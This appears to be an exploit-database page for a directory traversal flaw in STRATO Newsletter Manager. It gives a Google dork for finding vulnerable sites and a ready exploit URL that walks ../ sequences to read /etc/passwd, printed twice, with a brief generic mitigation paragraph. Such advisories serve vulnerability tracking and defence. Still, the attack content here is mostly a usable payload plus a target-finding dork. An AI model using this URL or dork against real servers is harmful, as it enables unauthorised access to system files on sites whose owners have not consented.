header-logo
Suggest Exploit
vendor:
STRATO Newsletter Manager
by:
Zero X
8,8
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: STRATO Newsletter Manager
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: None
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

STRATO Newsletter Manager is vulnerable against Directory Traversal

STRATO Newsletter Manager is vulnerable to a directory traversal attack. An attacker can use the Google Dork 'inurl:"newsletter.php.cgi"' to find vulnerable websites. The exploit is a URL with the following structure: http://server/cgi-bin/newsletter.php.cgi?PHPSESSID=af92ed633ae0d06d1e24d22520f709f7&action=nl_show&nl=../../../../../../../../../../../../../../etc/passwd. This URL can be used to access sensitive files on the server, such as the /etc/passwd file.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the web application is properly configured to prevent directory traversal attacks. This can be done by restricting access to sensitive files and directories, and by validating user input to ensure that it does not contain malicious characters.
Source

Exploit-DB raw data:

STRATO Newsletter Manager is vulnerable against Directory Traversal

Vendor: www.strato-cgi.de

Google Dork: inurl:"newsletter.php.cgi"


Exploit:

http://server/cgi-bin/newsletter.php.cgi?PHPSESSID=af92ed633ae0d06d1e24d22520f709f7&action=nl_show&nl=../../../../../../../../../../../../../../etc/passwd

Greetz Zero X

Navigation

Suggest Exploit

Services By CQR